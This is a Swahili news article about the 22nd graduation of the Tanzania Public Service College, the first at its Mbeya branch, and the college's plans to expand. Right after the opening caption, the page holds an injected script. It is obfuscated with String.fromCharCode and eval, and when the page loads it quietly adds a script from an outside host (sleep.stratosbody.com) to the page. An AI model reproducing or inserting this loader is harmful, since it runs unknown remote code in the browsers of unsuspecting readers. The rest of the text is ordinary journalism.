Recent Comments

Elimu ya utumishi wa umma kuongeza tija

By Baraka Bitariho Sep 7, 2015
<p>Wahitimu wa Chuo cha Utumishi wa Umma Tanzania, tawi la Mbeya wakiwa katika mahafali ya 22 ya chuo hicho na ya kwanza kwa tawi hilo</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Wahitimu wa Chuo cha Utumishi wa Umma Tanzania, tawi la Mbeya wakiwa katika mahafali ya 22 ya chuo hicho na ya kwanza kwa tawi hilo
Wahitimu wa Chuo cha Utumishi wa Umma Tanzania, tawi la Mbeya wakiwa katika mahafali ya 22 ya chuo hicho na ya kwanza kwa tawi hilo

SERIKALI imetoa mwito kwa watumishi wa umma Nyanda za Juu Kusini kulitumia tawi la Chuo cha Utumishi wa Umma (TPSC) mkoani Mbeya kujiendeleza kielimu ili kuongeza ufanishi katika utendaji wao wa kazi katika kuwahudumia wananchi.

Kanda hiyo inajumuisha mikoa ya Mbeya, Iringa, Ruvuma, Rukwa, Katavi na Njombe. Kaimu Katibu Mkuu Ofisi ya Rais Menejimenti ya Utumishi wa Umma, Hab Mkwizu anasema wakati wa mahafali ya 22 ya TPSC na ya kwanza kwa tawi la Mbeya, kuwa, iwapo watumishi hao watakitumia vyema chuo hicho ni wazi utendaji wao wa kazi utakuwa wenye tija zaidi kwa taifa sanjari na ufanisi katika kuwahumia wananchi.

Jumla ya wahitimu 335 waliosoma ngazi ya cheti cha awali wamehitimu na kutunukiwa vyeti katika kozi ya Awali ya Utawala Serikali za Mitaa, Cheti cha Awali Ununuzi na Ugavi, Cheti cha Awali Menejimenti ya Rasilimali Watu, Cheti cha Awali Sheria na Cheti cha Awali Utunzaji Kumbukumbu. Chuo hicho kimeongeza kozi zake na kufikia nane na kinatoa pia Stashahada katika fani za Uhazili, Tehama, Uhasibu, Utunzaji Kumbukumbu, Utawala wa Serikali za Mitaa, Usimamizi Rasilimali Watu, Ununuzi, Usimamizi wa Vifaa na Sheria.

Mkuu wa chuo hicho na Ofisa Mtendaji Mkuu, Said Hamis Nassor anasema, chuo hicho tawi la Mbeya kimeanza kutoa mafunzo Julai mwaka jana na kilianza na kozi ambazo wanafunzi wametunukiwa vyeti karibuni na kisha kuongeza kozi hadi kufikia nane. Anasema, watumishi wa umma wa mkoani Mbeya na mikoa ya jirani wanakaribishwa kujiunga chuo hicho. Watumishi wa umma watarajiwa yaani waliohitimu kidato sita na kidato cha nne wenye vigezo vilivyowekwa na chuo wamekaribishwa kujiunga na kozi tofauti.

Mkwizu anawapongeza wahitimu na kusema kwamba kuhitimu kwao kumetokana na juhudi walizozionesha masomoni. “Nawapongeza wahitimu kwani sasa mmekuwa ni nguzo imara katika utumishi wa umma,” anasema. Mkwizu anabainisha kuwa, serikali inafarijika kuona watumishi wa umma wanajiendeleza kielimu kila mara katika matawi ya Chuo cha Utumishi wa Umma yaliyopo Mbeya, Dar es Salaam, Tanga, Singida, Mtwara na Tabora.

“Pia naupongeza uongozi wa chuo kwa kutoa elimu kwa watumishi wa umma watarajiwa ambao ndiyo nguzo ya utumishi wa umma siku za usoni,” anasema. Mkwizu anasema, waajiri nchini wamekuwa wakivutiwa na watumishi waliopitia TPSC kwa sababu ya utendaji kazi wenye kuzingatia weledi na maadili. “Nawaomba nanyi (wahitimu) mkajitofautishe na wale ambao hawajapitia chuo hiki, mkafanye kazi kwa weledi, taaluma na nidhamu ya hali ya juu ili chuo hiki kiendelee kuheshimika,” anasema.

Mkwizu anasema, iwapo wahitimu hao watayatumia vyema mafunzo hayo mahali pa kazi, ni dhahiri kwamba wataweza kuisaidia serikali katika kutekeleza programu mbalimbali za maendeleo ikiwemo ya Matokeo Makubwa Sasa (BRN). Makamu Mkuu wa Chuo hicho, Dk Henry Mambo anayataja majukumu ya chuo hicho kuwa ni kutoa mafunzo kwa watumishi wa umma katika nyanja za menejimenti, uongozi, utawala na uendeshaji wa ofisi.

“Mafunzo yamegawanyika katika sehemu kuu mbili, mafunzo ya muda mfupi ambayo yanalenga katika kuboresha stadi za utendaji kazi za watumishi wa umma na pia mafunzo ya wazi ya mapitio ya upimaji wa utendaji kazi (OPRAS). Anasema, mafunzo ya muda mrefu katika ngazi za stashahada na cheti kwa wahitimu wa elimu ya sekondari yana lengo la kuandaa wataalamu watendaji katika ngazi za kuingilia katika utumishi wa umma.

“Majukumu yetu mengine ni kutoa ushauri wa kitaalamu na kufanya utafiti na kutoa machapisho katika nyanja za uongozi, menejimenti na utawala,” anasema Mambo. Mkwizu anasema, uamuzi wa chuo kuendelea kuongeza wigo wa huduma zake katika kanda mbalimbali nchini unaongeza fursa kwa watumishi wa umma na kupata elimu yenye manufaa kwa taifa.

Anasema, kila mwaka shule za sekondari zinatoa wahitimu wa kidato cha nne na cha sita, hivyo chuo hakina budi kwenda sanjari na kasi hiyo ya kuongezeka kwa wahitimu ili vijana wengi wa kitanzania waweze kusoma kozi mbalimbali zitakazowapa ujuzi wa kuwa watumishi wa umma au waajiri. Mkwizu anasema, serikali itaendelea kukiunga mkono chuo hicho katika jitihada za kupanua wigo wa matawi yake hivyo kijenge majengo ili kiweze kupunguza gharama za uendeshaji.

“Jengeni majengo yenu wenyewe hiki chuo ni cha kudumu si cha muda,” anasema. Wakazi wa Mbeya wanakipongeza chuo hicho kwa kufungua tawi jijini Mbeya. “Kwa kweli nawapongeza sana kwa jitihada zenu za kuleta elimu ya chuo chenu Jijini hapa,” anasema Mwamkinga Jonathan. Anatoa mwito kwa uongozi wa Mkoa wa Mbeya kushirikiana na chuo hicho ili kifikie malengo yake. Dk Mambo anasema, chuo kipo katika mchakato wa kufungua tawi lingine mkoani Mwanza litakalowahudumia pia wakazi wa Kanda ya Ziwa kwa ujumla.

Kwa mujibu wa Mambo, chuo kimenunua kiwanja chenye ekari 20 eneo la Luchelele jijini Mwanza ili kujenga tawi hilo. Waziri wa Nchi Ofisi ya Rais Menejimenti ya Utumishi wa Umma Celina Kombani, amekitembelea Chuo cha Utumishi wa Umma Mkoani Tabora na kujionea shughuli za maendeleo zinazofanywa hapo. Waziri Kombani amepata fursa ya kukagua jengo jipya la ghorofa chuoni hapo linalojengwa kwa ajili ya vyumba vya madarasa na ofisi.

Mkurugenzi wa tawi hilo, Lufunyo Saimon Hussein anamweleza Kombani kwamba, jengo hilo litagharimu Sh bilioni 2.6 na linajengwa kwa awamu mbili. Chuo kimenunua ekari 76.8 mkoani Singida eneo la Maji Mungu kwa ajili ya uwekezaji endelevu. Waziri Kombani anasema, hatua hiyo itakisaidia chuo kufanya uwekezaji ambao utakuwa na manufaa kwa kizazi cha sasa na kijacho hasa kwa kujenga miundombinu muhimu ya chuo ikiwemo madarasa, mabweni, ofisi na nyumba za walimu.

Nassor anabainisha kwamba taasisi yao imesajiliwa na NACTE. “Kusajiliwa na NACTE kuna faida ni nyingi sana, lakini kubwa zaidi ni kwamba wahitimu wetu wanaweza kujiunga na vyuo vikuu vya ndani na nje ya nchi yetu,” anasema. Anafafanua kuwa wahitimu ambao si watumishi wa umma ni rahisi kujiunga na utumishi wa umma ama kupata kazi katika sekta binafsi kwa sababu wamefundishwa namna ya kuhudumia umma.

“Tulipoanza chuo chetu kilikuwa na tawi la Tabora na Dar es Salaam lakini kwa sasa tumeongeza matawi mengine manne ambayo ni Singida, Mbeya, Tanga na Mtwara,” anasema Nassor. Chuo hicho kimeanzishwa mwaka 2000 chini ya Sheria ya Wakala wa Serikali ya mwaka 1997. Kuanzishwa TPSC kunafuatia muungano wa Chuo cha Watumishi wa Serikali, Dar es Salaam na Chuo cha Uhazili, Tabora.

Mkuu wa chuo hicho anayataja majukumu ya chuo hicho kuwa ni kutoa mafunzo kwa watumishi wa umma katika nyanja za menejimenti, uongozi, utawala na uendeshaji wa ofisi. Nassor anasema, chuo hicho ni wakala wa serikali chini ya Ofisi ya Rais, Menejimenti ya Utumishi wa Umma.

Anasema chuo hicho kinatilia mkazo upatikanaji wa elimu bora nchini, kinaandaa na kutoa mafunzo kwa watumishi wa serikali waliomo kwenye ngazi za mwanzo, kati na hata ngazi za juu katika fani za uongozi (nadharia na vitendo), utawala na mafunzo ya ukarani kwa madhumuni ya kuongeza ufanisi katika utendaji kazi. Nassor anasema, TPSC imefanikiwa katika mambo mengi, ikiwa ni pamoja na kuongezeka walimu wenye Shahada ya Uzamili na Uzamivu.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com